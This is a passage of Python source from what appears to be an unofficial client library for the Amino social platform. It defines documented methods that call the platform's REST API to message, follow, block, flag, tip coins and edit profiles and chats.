else: return objects.UserProfileList(json.loads(response.text)["userProfileList"]).UserProfileList
def get_user_followers(self, userId: str, start: int = 0, size: int = 25):
"""
List of Users that are Following the User.
**Parameters**
- **userId** : ID of the User.
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`User List <amino.lib.util.objects.UserProfileList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/user-profile/{userId}/member?start={start}&size={size}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileList(json.loads(response.text)["userProfileList"]).UserProfileList
def get_user_visitors(self, userId: str, start: int = 0, size: int = 25):
"""
List of Users that Visited the User.
**Parameters**
- **userId** : ID of the User.
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Visitors List <amino.lib.util.objects.VisitorsList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/user-profile/{userId}/visitors?start={start}&size={size}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.VisitorsList(json.loads(response.text)).VisitorsList
def get_blocked_users(self, start: int = 0, size: int = 25):
"""
List of Users that the User Blocked.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Users List <amino.lib.util.objects.UserProfileList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/block?start={start}&size={size}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileList(json.loads(response.text)["userProfileList"]).UserProfileList
def get_blog_info(self, blogId: str = None, wikiId: str = None, quizId: str = None, fileId: str = None):
if blogId or quizId:
if quizId is not None: blogId = quizId
response = requests.get(f"{self.api}/g/s/blog/{blogId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.GetBlogInfo(json.loads(response.text)).GetBlogInfo
elif wikiId:
response = requests.get(f"{self.api}/g/s/item/{wikiId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.GetWikiInfo(json.loads(response.text)).GetWikiInfo
elif fileId:
response = requests.get(f"{self.api}/g/s/shared-folder/files/{fileId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.SharedFolderFile(json.loads(response.text)["file"]).SharedFolderFile
else: raise exceptions.SpecifyType()
def get_blog_comments(self, blogId: str = None, wikiId: str = None, quizId: str = None, fileId: str = None, sorting: str = "newest", start: int = 0, size: int = 25):
if sorting == "newest": sorting = "newest"
elif sorting == "oldest": sorting = "oldest"
elif sorting == "top": sorting = "vote"
if blogId or quizId:
if quizId is not None: blogId = quizId
response = requests.get(f"{self.api}/g/s/blog/{blogId}/comment?sort={sorting}&start={start}&size={size}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
elif wikiId: response = requests.get(f"{self.api}/g/s/item/{wikiId}/comment?sort={sorting}&start={start}&size={size}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
elif fileId: response = requests.get(f"{self.api}/g/s/shared-folder/files/{fileId}/comment?sort={sorting}&start={start}&size={size}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType()
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommentList(json.loads(response.text)["commentList"]).CommentList
def get_blocker_users(self, start: int = 0, size: int = 25):
"""
List of Users that are Blocking the User.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`List of User IDs <None>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/block/full-list?start={start}&size={size}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["blockerUidList"]
def get_wall_comments(self, userId: str, sorting: str, start: int = 0, size: int = 25):
"""
        List of Wall Comments of a User.
**Parameters**
- **userId** : ID of the User.
- **sorting** : Order of the Comments.
- ``newest``, ``oldest``, ``top``
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Comments List <amino.lib.util.objects.CommentList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if sorting.lower() == "newest": sorting = "newest"
elif sorting.lower() == "oldest": sorting = "oldest"
elif sorting.lower() == "top": sorting = "vote"
else: raise exceptions.SpecifyType
response = requests.get(f"{self.api}/g/s/user-profile/{userId}/g-comment?sort={sorting}&start={start}&size={size}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommentList(json.loads(response.text)["commentList"]).CommentList
def flag(self, reason: str, flagType: int, userId: str = None, blogId: str = None, wikiId: str = None, asGuest: bool = False):
"""
Flag a User, Blog or Wiki.
**Parameters**
- **reason** : Reason of the Flag.
- **flagType** : Type of the Flag.
- **userId** : ID of the User.
- **blogId** : ID of the Blog.
- **wikiId** : ID of the Wiki.
- *asGuest* : Execute as a Guest.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if reason is None: raise exceptions.ReasonNeeded
if flagType is None: raise exceptions.FlagTypeNeeded
data = {
"flagType": flagType,
"message": reason,
"timestamp": int(timestamp() * 1000)
}
if userId:
data["objectId"] = userId
data["objectType"] = 0
elif blogId:
data["objectId"] = blogId
data["objectType"] = 1
elif wikiId:
data["objectId"] = wikiId
data["objectType"] = 2
else: raise exceptions.SpecifyType
if asGuest: flg = "g-flag"
else: flg = "flag"
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/{flg}", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def send_message(self, chatId: str, message: str = None, messageType: int = 0, file: BinaryIO = None, fileType: str = None, replyTo: str = None, mentionUserIds: list = None, stickerId: str = None, embedId: str = None, embedType: int = None, embedLink: str = None, embedTitle: str = None, embedContent: str = None, embedImage: BinaryIO = None):
"""
Send a Message to a Chat.
**Parameters**
- **message** : Message to be sent
- **chatId** : ID of the Chat.
- **file** : File to be sent.
- **fileType** : Type of the file.
- ``audio``, ``image``, ``gif``
- **messageType** : Type of the Message.
            - **mentionUserIds** : List of User IDs to mention. '@' needed in the Message.
- **replyTo** : Message ID to reply to.
- **stickerId** : Sticker ID to be sent.
- **embedTitle** : Title of the Embed.
- **embedContent** : Content of the Embed.
- **embedLink** : Link of the Embed.
- **embedImage** : Image of the Embed.
- **embedId** : ID of the Embed.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if message is not None and file is None:
message = message.replace("<$", "").replace("$>", "")
mentions = []
if mentionUserIds:
for mention_uid in mentionUserIds:
mentions.append({"uid": mention_uid})
if embedImage:
embedImage = [[100, self.upload_media(embedImage, "image"), None]]
data = {
"type": messageType,
"content": message,
"clientRefId": int(timestamp() / 10 % 1000000000),
"attachedObject": {
"objectId": embedId,
"objectType": embedType,
"link": embedLink,
"title": embedTitle,
"content": embedContent,
"mediaList": embedImage
},
"extensions": {"mentionedArray": mentions},
"timestamp": int(timestamp() * 1000)
}
if replyTo: data["replyMessageId"] = replyTo
if stickerId:
data["content"] = None
data["stickerId"] = stickerId
data["type"] = 3
if file:
data["content"] = None
if fileType == "audio":
data["type"] = 2
data["mediaType"] = 110
elif fileType == "image":
data["mediaType"] = 100
data["mediaUploadValueContentType"] = "image/jpg"
data["mediaUhqEnabled"] = True
elif fileType == "gif":
data["mediaType"] = 100
data["mediaUploadValueContentType"] = "image/gif"
data["mediaUhqEnabled"] = True
else: raise exceptions.SpecifyType
data["mediaUploadValue"] = base64.b64encode(file.read()).decode()
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/message", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
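    # Usage sketches with placeholder IDs and a local file (assumed paths):
    #
    #   client.send_message(chatId="chat-id", message="hello")
    #   client.send_message(chatId="chat-id", message="reply", replyTo="message-id")
    #   with open("picture.jpg", "rb") as f:
    #       client.send_message(chatId="chat-id", file=f, fileType="image")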
def delete_message(self, chatId: str, messageId: str, asStaff: bool = False, reason: str = None):
"""
Delete a Message from a Chat.
**Parameters**
- **messageId** : ID of the Message.
- **chatId** : ID of the Chat.
- **asStaff** : If execute as a Staff member (Leader or Curator).
- **reason** : Reason of the action to show on the Moderation History.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"adminOpName": 102,
"adminOpNote": {"content": reason},
"timestamp": int(timestamp() * 1000)
}
data = json.dumps(data)
if not asStaff: response = requests.delete(f"{self.api}/g/s/chat/thread/{chatId}/message/{messageId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
else: response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/message/{messageId}/admin", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def mark_as_read(self, chatId: str, messageId: str):
"""
Mark a Message from a Chat as Read.
**Parameters**
- **messageId** : ID of the Message.
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"messageId": messageId,
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/mark-as-read", headers=headers.Headers().headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def edit_chat(self, chatId: str, doNotDisturb: bool = None, pinChat: bool = None, title: str = None, icon: str = None, backgroundImage: str = None, content: str = None, announcement: str = None, coHosts: list = None, keywords: list = None, pinAnnouncement: bool = None, publishToGlobal: bool = None, canTip: bool = None, viewOnly: bool = None, canInvite: bool = None, fansOnly: bool = None):
"""
        Edit a Chat.
**Parameters**
- **chatId** : ID of the Chat.
- **title** : Title of the Chat.
- **content** : Content of the Chat.
- **icon** : Icon of the Chat.
- **backgroundImage** : Url of the Background Image of the Chat.
- **announcement** : Announcement of the Chat.
            - **pinAnnouncement** : If the Chat Announcement should be Pinned or not.
            - **coHosts** : List of User IDs to be Co-Host.
- **keywords** : List of Keywords of the Chat.
- **viewOnly** : If the Chat should be on View Only or not.
- **canTip** : If the Chat should be Tippable or not.
- **canInvite** : If the Chat should be Invitable or not.
- **fansOnly** : If the Chat should be Fans Only or not.
- **publishToGlobal** : If the Chat should show on Public Chats or not.
            - **doNotDisturb** : If Do Not Disturb should be enabled or not.
            - **pinChat** : If the Chat should be Pinned or not.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {"timestamp": int(timestamp() * 1000)}
if title: data["title"] = title
if content: data["content"] = content
if icon: data["icon"] = icon
if keywords: data["keywords"] = keywords
if announcement: data["extensions"] = {"announcement": announcement}
if pinAnnouncement: data["extensions"] = {"pinAnnouncement": pinAnnouncement}
if fansOnly: data["extensions"] = {"fansOnly": fansOnly}
if publishToGlobal: data["publishToGlobal"] = 0
if not publishToGlobal: data["publishToGlobal"] = 1
res = []
if doNotDisturb is not None:
if doNotDisturb:
data = json.dumps({"alertOption": 2, "timestamp": int(timestamp() * 1000)})
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}/alert", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not doNotDisturb:
data = json.dumps({"alertOption": 1, "timestamp": int(timestamp() * 1000)})
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}/alert", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if pinChat is not None:
if pinChat:
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/pin", data=data, headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not pinChat:
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/unpin", data=data, headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if backgroundImage is not None:
data = json.dumps({"media": [100, backgroundImage, None], "timestamp": int(timestamp() * 1000)})
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}/background", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if coHosts is not None:
data = json.dumps({"uidList": coHosts, "timestamp": int(timestamp() * 1000)})
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/co-host", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if viewOnly is not None:
if viewOnly:
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/view-only/enable", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not viewOnly:
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/view-only/disable", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if canInvite is not None:
if canInvite:
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/members-can-invite/enable", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not canInvite:
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/members-can-invite/disable", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if canTip is not None:
if canTip:
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/tipping-perm-status/enable", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not canTip:
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/tipping-perm-status/disable", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
return res
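    # A sketch of a combined edit with placeholder values; the return value is
    # a list with one status code (or exception) per sub-request issued:
    #
    #   results = client.edit_chat(chatId="chat-id", title="New title", pinChat=True, doNotDisturb=True)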
def visit(self, userId: str):
"""
        Visit a User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/user-profile/{userId}?action=visit", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def send_coins(self, coins: int, blogId: str = None, chatId: str = None, objectId: str = None, transactionId: str = None):
url = None
if transactionId is None: transactionId = str(UUID(hexlify(urandom(16)).decode('ascii')))
data = {
"coins": coins,
"tippingContext": {"transactionId": transactionId},
"timestamp": int(timestamp() * 1000)
}
if blogId is not None: url = f"{self.api}/g/s/blog/{blogId}/tipping"
if chatId is not None: url = f"{self.api}/g/s/chat/thread/{chatId}/tipping"
if objectId is not None:
data["objectId"] = objectId
data["objectType"] = 2
url = f"{self.api}/g/s/tipping"
if url is None: raise exceptions.SpecifyType()
data = json.dumps(data)
response = requests.post(url, headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
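    # A minimal tipping sketch with a placeholder ID; exactly one of blogId,
    # chatId or objectId must be given, otherwise SpecifyType is raised:
    #
    #   client.send_coins(coins=10, chatId="chat-id")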
def follow(self, userId: [str, list]):
"""
        Follow a User or Multiple Users.
**Parameters**
- **userId** : ID of the User or List of IDs of the Users.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if isinstance(userId, str):
response = requests.post(f"{self.api}/g/s/user-profile/{userId}/member", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
elif isinstance(userId, list):
data = json.dumps({"targetUidList": userId, "timestamp": int(timestamp() * 1000)})
response = requests.post(f"{self.api}/g/s/user-profile/{self.userId}/joined", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.WrongType
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def unfollow(self, userId: str):
"""
        Unfollow a User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.delete(f"{self.api}/g/s/user-profile/{userId}/member/{self.userId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def block(self, userId: str):
"""
        Block a User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.post(f"{self.api}/g/s/block/{userId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def unblock(self, userId: str):
"""
        Unblock a User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.delete(f"{self.api}/g/s/block/{userId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def join_community(self, comId: str, invitationId: str = None):
"""
Join a Community.
**Parameters**
- **comId** : ID of the Community.
- **invitationId** : ID of the Invitation Code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {"timestamp": int(timestamp() * 1000)}
if invitationId: data["invitationId"] = invitationId
data = json.dumps(data)
response = requests.post(f"{self.api}/x{comId}/s/community/join", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def request_join_community(self, comId: str, message: str = None):
"""
Request to join a Community.
**Parameters**
- **comId** : ID of the Community.
- **message** : Message to be sent.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({"message": message, "timestamp": int(timestamp() * 1000)})
response = requests.post(f"{self.api}/x{comId}/s/community/membership-request", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def leave_community(self, comId: str):
"""
Leave a Community.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.post(f"{self.api}/x{comId}/s/community/leave", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def flag_community(self, comId: str, reason: str, flagType: int, isGuest: bool = False):
"""
Flag a Community.
**Parameters**
- **comId** : ID of the Community.
- **reason** : Reason of the Flag.
- **flagType** : Type of Flag.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if reason is None: raise exceptions.ReasonNeeded
if flagType is None: raise exceptions.FlagTypeNeeded
data = json.dumps({
"objectId": comId,
"objectType": 16,
"flagType": flagType,
"message": reason,
"timestamp": int(timestamp() * 1000)
})
if isGuest: flg = "g-flag"
else: flg = "flag"
response = requests.post(f"{self.api}/x{comId}/s/{flg}", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def edit_profile(self, nickname: str = None, content: str = None, icon: BinaryIO = None, backgroundColor: str = None, backgroundImage: str = None, defaultBubbleId: str = None):
"""
Edit account's Profile.
**Parameters**
- **nickname** : Nickname of the Profile.
- **content** : Biography of the Profile.
- **icon** : Icon of the Profile.
- **backgroundImage** : Url of the Background Picture of the Profile.
- **backgroundColor** : Hexadecimal Background Color of the Profile.
- **defaultBubbleId** : Chat bubble ID.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"address": None,
"latitude": 0,
"longitude": 0,
"mediaList": None,
"eventSource": "UserProfileView",
"timestamp": int(timestamp() * 1000)
}
if nickname: data["nickname"] = nickname
if icon: data["icon"] = self.upload_media(icon, "image")
if content: data["content"] = content
if backgroundColor: data["extensions"] = {"style": {"backgroundColor": backgroundColor}}
if backgroundImage: data["extensions"] = {"style": {"backgroundMediaList": [[100, backgroundImage, None, None, None]]}}
if defaultBubbleId: data["extensions"] = {"defaultBubbleId": defaultBubbleId}
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/user-profile/{self.userId}", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
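    # A minimal sketch with placeholder values; icon takes an open binary file,
    # which is uploaded via upload_media before the profile update is posted:
    #
    #   with open("icon.jpg", "rb") as f:
    #       client.edit_profile(nickname="New Name", content="New bio", icon=f)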
def set_privacy_status(self, isAnonymous: bool = False, getNotifications: bool = False):
"""
Edit account's Privacy Status.
**Parameters**
- **isAnonymous** : If visibility should be Anonymous or not.
- **getNotifications** : If account should get new Visitors Notifications.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {"timestamp": int(timestamp() * 1000)}
if not isAnonymous: data["privacyMode"] = 1
if isAnonymous: data["privacyMode"] = 2
if not getNotifications: data["notificationStatus"] = 2
if getNotifications: data["privacyMode"] = 1
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/account/visit-settings", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def set_amino_id(self, aminoId: str):
"""
Edit account's Amino ID.
**Parameters**
- **aminoId** : Amino ID of the Account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({"aminoId": aminoId, "timestamp": int(timestamp() * 1000)})
response = requests.post(f"{self.api}/g/s/account/change-amino-id", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def get_linked_communities(self, userId: str):
"""
        Get a List of Linked Communities of a User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : :meth:`Community List <amino.lib.util.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/user-profile/{userId}/linked-community", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommunityList(json.loads(response.text)["linkedCommunityList"]).CommunityList
def get_unlinked_communities(self, userId: str):
"""
        Get a List of Unlinked Communities of a User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : :meth:`Community List <amino.lib.util.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/user-profile/{userId}/linked-community", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommunityList(json.loads(response.text)["unlinkedCommunityList"]).CommunityList
def reorder_linked_communities(self, comIds: list):
"""
Reorder List of Linked Communities.
**Parameters**
            - **comIds** : IDs of the Communities.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({"ndcIds": comIds, "timestamp": int(timestamp() * 1000)})
response = requests.post(f"{self.api}/g/s/user-profile/{self.userId}/linked-community/reorder", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def add_linked_community(self, comId: str):
"""
Add a Linked Community on your profile.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.post(f"{self.api}/g/s/user-profile/{self.userId}/linked-community/{comId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def remove_linked_community(self, comId: str):
"""
Remove a Linked Community on your profile.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.delete(f"{self.api}/g/s/user-profile/{self.userId}/linked-community/{comId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def comment(self, message: str, userId: str = None, blogId: str = None, wikiId: str = None, replyTo: str = None):
"""
Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **message** : Message to be sent.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
- **replyTo** : ID of the Comment to Reply to.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if message is None: raise exceptions.MessageNeeded
data = {
"content": message,
"stickerId": None,
"type": 0,
"timestamp": int(timestamp() * 1000)
}
if replyTo: data["respondTo"] = replyTo
if userId:
data["eventSource"] = "UserProfileView"
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/user-profile/{userId}/g-comment", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
elif blogId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/blog/{blogId}/g-comment", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
elif wikiId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/item/{wikiId}/g-comment", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def delete_comment(self, commentId: str, userId: str = None, blogId: str = None, wikiId: str = None):
"""
Delete a Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **commentId** : ID of the Comment.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if userId: response = requests.delete(f"{self.api}/g/s/user-profile/{userId}/g-comment/{commentId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
elif blogId: response = requests.delete(f"{self.api}/g/s/blog/{blogId}/g-comment/{commentId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
elif wikiId: response = requests.delete(f"{self.api}/g/s/item/{wikiId}/g-comment/{commentId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def like_blog(self, blogId: [str, list] = None, wikiId: str = None):
"""
Like a Blog, Multiple Blogs or a Wiki.
**Parameters**
